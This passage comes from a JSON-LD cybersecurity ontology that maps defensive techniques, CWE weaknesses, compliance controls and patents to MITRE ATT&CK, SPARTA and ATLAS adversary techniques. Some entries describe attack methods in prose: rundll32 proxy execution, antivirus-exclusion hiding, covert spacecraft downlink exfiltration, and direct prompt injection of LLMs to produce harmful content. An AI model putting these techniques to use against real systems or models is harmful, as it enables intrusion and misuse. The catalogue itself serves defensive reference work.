      "rdfs:label": "Program Organization Units - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Program Organization Units"
    },
    {
      "@id": "d3f:HostReboot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HostReboot"
      ],
      "d3f:d3fend-id": "D3-HR",
      "d3f:definition": "Initiating a host's reboot sequence to terminate all running processes.",
      "d3f:kb-article": "## How It Works\n\nHost reboot can either be initiated in the physical presence of the device using the power functions or remotely using the provided user interface or an installed EDR agent (with the available function). This process may allow for the removal of specific types of malware, such as fileless malware, and can also prevent further damage, for example, if the system is part of a botnet.\n\n## Considerations\n\n- If the attacker has achieved persistence techniques, this technique may not be effective\n- Compromised systems may not respond to remote commands to shutdown or reboot, requiring physical intervention.\n- Shutting down a system will usually result in the memory losing its state which can be useful in forensic activities so this should be considered when deciding to shutdown.\n- Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware"
      },
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Host Reboot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HostShutdown"
        },
        {
          "@id": "_:N8378de4e19104ae7b12cf7a105a1fa6e"
        }
      ]
    },
    {
      "@id": "_:N8378de4e19104ae7b12cf7a105a1fa6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:Restore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The restore tactic is used to return the system to a better state.",
      "d3f:display-order": 5,
      "d3f:display-priority": 0,
      "rdfs:label": "Restore",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:T1196",
      "@type": "owl:Class",
      "d3f:attack-id": "T1196",
      "d3f:definition": "Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.002",
      "rdfs:label": "Control Panel Items",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:MemoryAllocationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the allocation of memory resources to a process, providing it with the capacity to store data or execute instructions.",
      "rdfs:label": "Memory Allocation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryEvent"
      }
    },
    {
      "@id": "d3f:Reference-TamperProofMutatingSoftware_ARXANTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9262600B2/en?oq=US9262600B2"
      },
      "d3f:kb-abstract": "System and method is disclosed for protecting client software running on a client computer from tampering using a secure server. Prior to or independent of executing the client software, the system integrates self-protection into the client software; removes functions from the client software for execution on the server; develops client software self-protection updates; and periodically distributes the updates. During execution of the client software, the system receives an initial request from the client computer for execution of the removed function; verifies the initial request; and cooperates with the client computer in execution of the client software if verification is successful. If verification is unsuccessful, the system can attempt to update the client software on the client computer; and require a new initial request. Client software can be updated on occurrence of a triggering event. Communications can be encrypted, and the encryption updated. Authenticating checksums can be used for verification.",
      "d3f:kb-author": "Kevin Dale Morgan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "ARXAN TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Tamper proof mutating software",
      "rdfs:label": "Reference - Tamper proof mutating software - ARXAN TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:OSAPISaveRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves and saves the values of CPU registers for a specific process or thread.",
      "d3f:invokes": {
        "@id": "d3f:SaveRegister"
      },
      "rdfs:label": "OS API Save Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8776c085a11448cb84dddd55211d7230"
        }
      ]
    },
    {
      "@id": "_:N8776c085a11448cb84dddd55211d7230",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SaveRegister"
      }
    },
    {
      "@id": "d3f:ConvolutionalNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CNN",
      "d3f:definition": "A class of artificial neural network most commonly applied to analyze visual imagery.CNNs use a mathematical operation called convolution in place of general matrix multiplication in at least one of their layers.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Convolutional neural network. [Link](https://en.wikipedia.org/wiki/Convolutional_neural_network)",
      "rdfs:label": "Convolutional Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:DeepNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:CCI-000200_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits password reuse for the organization-defined number of generations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000200"
    },
    {
      "@id": "d3f:SPARTADefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0006"
      },
      "rdfs:label": "Defense Evasion Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N9130317a4b904a7a95df512689a0edce"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N9130317a4b904a7a95df512689a0edce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0006"
      }
    },
    {
      "@id": "d3f:ClockSynchronizationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software clock adjusts its value based on an external time reference (e.g., NTP server, GPS time signal).",
      "rdfs:label": "Clock Synchronization Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareClockEvent"
      }
    },
    {
      "@id": "d3f:ResamplingEnsemble",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RE",
      "d3f:definition": "In the method, the small classes are oversampled and large classes are undersampled. The resampling scale is determined by the ratio of the min class number and max class number. And multiple machine learning methods are selected to construct the ensemble",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nTorgo, L. (2014). A resampling ensemble algorithm for improved accuracy. *Neurocomputing*, 134, 55-66.  [Link](https://www.sciencedirect.com/science/article/pii/S0925231214007644#:~:text=A%20resampling%20ensemble%20algorithm%20is,and%20undersampling%20are%20empirically%20analyzed).",
      "rdfs:label": "Resampling Ensemble",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-695",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-695",
      "d3f:definition": "The product uses low-level functionality that is explicitly prohibited by the framework or specification under which the product is supposed to operate.",
      "rdfs:label": "Use of Low-Level Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:SSHConnectionResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the abrupt termination of an SSH connection due to protocol errors, network disruptions, or administrative actions.",
      "rdfs:label": "SSH Connection Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionResetEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        },
        {
          "@id": "_:N8300b58609604be7b49cdd87fdbb9da6"
        }
      ]
    },
    {
      "@id": "_:N8300b58609604be7b49cdd87fdbb9da6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:ProcessorRegister",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:CentralProcessingUnit"
      },
      "d3f:definition": "A processor register is a quickly accessible location available to a computer's processor. Registers usually consist of a small amount of fast storage, although some registers have specific hardware functions, and may be read-only or write-only.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Processor_register"
      },
      "rdfs:label": "Processor Register",
      "rdfs:seeAlso": {
        "@id": "https://www.techtarget.com/whatis/definition/register"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
          "@id": "_:Nc16d0eeb0b0a4a60beb5dea213853afc"
        }
      ]
    },
    {
      "@id": "_:Nc16d0eeb0b0a4a60beb5dea213853afc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CentralProcessingUnit"
      }
    },
    {
      "@id": "d3f:Reference-PostSandboxMethodsAndSystemsForDetectingAndBlockingZero-dayExploitsViaApiCallValidation_K2CyberSecurityInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190138715A1/"
      },
      "d3f:kb-abstract": "In one aspect, a method useful for monitoring and validating execution of executable binary code, includes the step of disassembling an executable binary code of an application. The method includes the step of detecting and obtaining location and type of an application programming interface (API) call, system call, and privileged instruction that is executed by the executable binary code. The method includes the step of detecting and obtaining return address from an Al call and system call. The method includes the step of validating location of the API call system call, and privileged instruction. The method includes the step of validating return from the API call and system call.",
      "d3f:kb-author": "Jayant Shukla",
      "d3f:kb-mitre-analysis": "The patent describes a technique for monitoring API calls. Executable binary code of an application is first disassembled and scanned for API calls. Based on the recorded API calls, a rule list is generated. Software hooks are placed in the code for monitoring API calls during program execution and then each API call is validated using the generated rule list to permit or deny execution of API calls.\n\nRules are created that specify the type and location of the API call. For example, data collected for an application can show an API call to libc at address 0x43e0 and an API call by libc at address 0xlfb47. Accordingly, two rules are generated. The first rule specifies the location type and target of the API call at address 0x43e0, as well as the return address. The second rule is for the API call to the kernel and states the target address, return address, instruction, and target type.",
      "d3f:kb-organization": "K2 Cyber Security Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation",
      "rdfs:label": "Reference - Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation - K2 Cyber Security Inc"
    },
    {
      "@id": "d3f:CWE-242",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-242",
      "d3f:definition": "The product calls a function that can never be guaranteed to work safely.",
      "rdfs:label": "Use of Inherently Dangerous Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1177"
      }
    },
    {
      "@id": "d3f:Subroutine",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In different programming languages, a subroutine may be called a procedure, a function, a routine, a method, or a subprogram. The generic term callable unit is sometimes used.",
      "d3f:synonym": [
        "Method",
        "Semantic Subroutine",
        "Software Function"
      ],
      "rdfs:label": "Subroutine",
      "rdfs:seeAlso": {
        "@id": "dbr:Subroutine"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:may-add",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-add y: The entity x may add the thing y; that is, 'x adds y' may be true.",
      "rdfs:label": "may-add",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:identifier",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "identifier"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:TA0042",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.",
      "d3f:display-order": 0,
      "rdfs:label": "Resource Development",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-34",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-34",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '....//'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:SafeMode",
      "@type": "owl:Class",
      "d3f:definition": "An intentionally constrained operating mode of a system in which nonessential functions are disabled or limited and control is shifted to a minimal, well-tested configuration that prioritizes preventing harm (to the system, its environment, or data), maintaining basic stability and monitoring, and enabling diagnosis and recovery back to normal operation.",
      "rdfs:label": "Safe Mode",
      "rdfs:seeAlso": {
        "@id": "dbr:Safe_mode"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:UnsupervisedPreprocessing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-UP",
      "d3f:definition": "When performing unsupervised learning, the machine is presented with unlabeled data. (Unlabeled data has no target.) Unsupervised learning algorithms seek to discover intrinsic patterns that underlie the data, such as a clustering parameter or a redundant parameter (dimension) that can be reduced.",
      "d3f:kb-article": "## References\nSAS Institute Inc. (n.d.). Decision Trees. In SAS® Visual Data Mining and Machine Learning.[Link](https://documentation.sas.com/doc/en/vdmmlcdc/8.4/vdmmladvug/n1e4spzcnv1f0fn1vsxhbzgdp1bb.htm).",
      "rdfs:label": "Unsupervised Preprocessing",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:Pipe",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In Unix-like computer operating systems, a pipeline is a mechanism for inter-process communication using message passing.  In the strictest sense, a pipe is a single segment of a pipeline, allowing one process to pass information forward to another.  Network pipes allow processes on different hosts to interact.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.linfo.org/pipe.html"
      },
      "rdfs:label": "Pipe",
      "rdfs:seeAlso": {
        "@id": "dbr:Pipeline_(Unix)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Pipeline"
    },
    {
      "@id": "d3f:has-member",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:member-of"
      },
      "rdfs:label": "has-member",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:EXF-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0006",
      "d3f:definition": "The adversary alters radio/optical link configuration so the spacecraft emits mission data over paths the program does not monitor or control. Levers include retuning carriers, adding sidebands or subcarriers, changing modulation/coding profiles, remapping virtual channels/APIDs, editing beacon content, or redirecting routing tables in regenerative payloads. Data can be embedded steganographically (idle fields, padding, frame counters, pilot tones) or carried on a covert auxiliary downlink/crosslink pointed at attacker-owned apertures. Because these emissions conform to plausible waveforms and scheduler behavior, they appear as ordinary link activity while quietly conveying payload products, housekeeping, or file fragments to non-mission receivers.",
      "rdfs:label": "Modify Communications Configuration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Modify Communications Configuration"
    },
    {
      "@id": "d3f:T0883",
      "@type": "owl:Class",
      "d3f:attack-id": "T0883",
      "d3f:definition": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.",
      "rdfs:label": "Internet Accessible Device - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Internet Accessible Device"
    },
    {
      "@id": "d3f:T1662",
      "@type": "owl:Class",
      "d3f:attack-id": "T1662",
      "d3f:definition": "Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.",
      "rdfs:label": "Data Destruction - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Destruction"
    },
    {
      "@id": "d3f:AML.T0006",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0006",
      "d3f:definition": "An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.\n\nAdversaries may scan for open ports on a potential victim's network, which can indicate specific services or tools the victim is utilizing. This could include a scan for tools related to AI DevOps or AI services themselves such as public AI chat agents (ex: [Copilot Studio Hunter](https://github.com/mbrg/power-pwn/wiki/Modules:-Copilot-Studio-Hunter-%E2%80%90-Enum)). They can also send emails to organization service addresses and inspect the replies for indicators that an AI agent is managing the inbox.\n\nInformation gained from Active Scanning may yield targets that provide opportunities for other forms of reconnaissance such as [Search Open Technical Databases](/techniques/AML.T0000), [Search Open AI Vulnerability Analysis](/techniques/AML.T0001), or [Gather RAG-Indexed Targets](/techniques/AML.T0064).",
      "rdfs:label": "Active Scanning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Active Scanning"
    },
    {
      "@id": "d3f:T1218.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.011",
      "d3f:definition": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Rundll32",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N00a50369174d4cc49bfb2b3c5e14f393"
        },
        {
          "@id": "_:N3e4621fb953b4651aec1ae66d430be16"
        }
      ]
    },
    {
      "@id": "_:N00a50369174d4cc49bfb2b3c5e14f393",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N3e4621fb953b4651aec1ae66d430be16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:CWE-406",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-406",
      "d3f:definition": "The product does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the product to transmit more traffic than should be allowed for that actor.",
      "rdfs:label": "Insufficient Control of Network Message Volume (Network Amplification)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-001686_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account removal actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001686"
    },
    {
      "@id": "d3f:procedure-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Procedure"
      ],
      "d3f:implements": {
        "@id": "d3f:T1134.001"
      },
      "d3f:start": {
        "@id": "d3f:step-1"
      },
      "rdfs:label": "Procedure 1 - T1134.001 Access Token Manipulation"
    },
    {
      "@id": "d3f:T1565.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.002",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:may-modify": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Transmitted Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:Nde31ab37b8664193995781c6cfaf96cb"
        }
      ]
    },
    {
      "@id": "_:Nde31ab37b8664193995781c6cfaf96cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:SMBFileOpenIfEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened if it exists, or created if it does not. This operation merges file creation and access behavior.",
      "rdfs:label": "SMB File Open If Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:CWE-636",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-636",
      "d3f:definition": "When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.",
      "d3f:synonym": "Failing Open",
      "rdfs:label": "Not Failing Securely ('Failing Open')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-12",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-12",
      "d3f:definition": "An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.",
      "rdfs:label": "ASP.NET Misconfiguration: Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-756"
      }
    },
    {
      "@id": "d3f:expectation-rating",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "expectation-rating",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_11",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Restrict Access to Specific Information Types",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(11)"
    },
    {
      "@id": "d3f:CWE-140",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-140",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes delimiters.",
      "rdfs:label": "Improper Neutralization of Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-1310",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1310",
      "d3f:definition": "Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state.",
      "rdfs:label": "Missing Ability to Patch ROM Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1329"
      }
    },
    {
      "@id": "d3f:T1564.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.012",
      "d3f:definition": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)",
      "rdfs:label": "File/Path Exclusions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-403",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-403",
      "d3f:definition": "A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.",
      "d3f:synonym": "File descriptor leak",
      "rdfs:label": "Exposure of File Descriptor to Unintended Control Sphere ('File Descriptor Leak')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-402"
      }
    },
    {
      "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.",
      "d3f:enables": {
        "@id": "d3f:TA0107"
      },
      "rdfs:label": "Inhibit Response Function Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nf520c5919fd04515863d486f502762e5"
        }
      ],
      "skos:prefLabel": "Inhibit Response Function Technique"
    },
    {
      "@id": "_:Nf520c5919fd04515863d486f502762e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0107"
      }
    },
    {
      "@id": "d3f:HardwareCryptographicModule",
      "@type": "owl:Class"
    },
    {
      "@id": "d3f:Reference-PsSuspend",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend"
      },
      "d3f:kb-author": "Mark Russinovich",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSuspension"
      },
      "d3f:kb-reference-title": "PsSuspend",
      "rdfs:label": "Reference - PsSuspend - Microsoft"
    },
    {
      "@id": "d3f:TemporalDifferenceLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TDL",
      "d3f:definition": "Temporal difference (TD) learning refers to a class of model-free reinforcement learning methods which learn by bootstrapping from the current estimate of the value function. These methods sample from the environment, like Monte Carlo methods, and perform updates based on current estimates, like dynamic programming methods",
      "d3f:kb-article": "## References\nTemporal difference learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Temporal_difference_learning).",
      "rdfs:comment": "Temporal difference (TD) learning refers to a class of model-free reinforcement learning methods which learn by bootstrapping from the current estimate of the value function.",
      "rdfs:label": "Temporal Difference Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:AML.T0051.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.000",
      "d3f:definition": "An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content.",
      "rdfs:label": "Direct - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Direct"
    },
    {
      "@id": "d3f:ResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:resumes": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Resume Thread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-resumethread"
      },
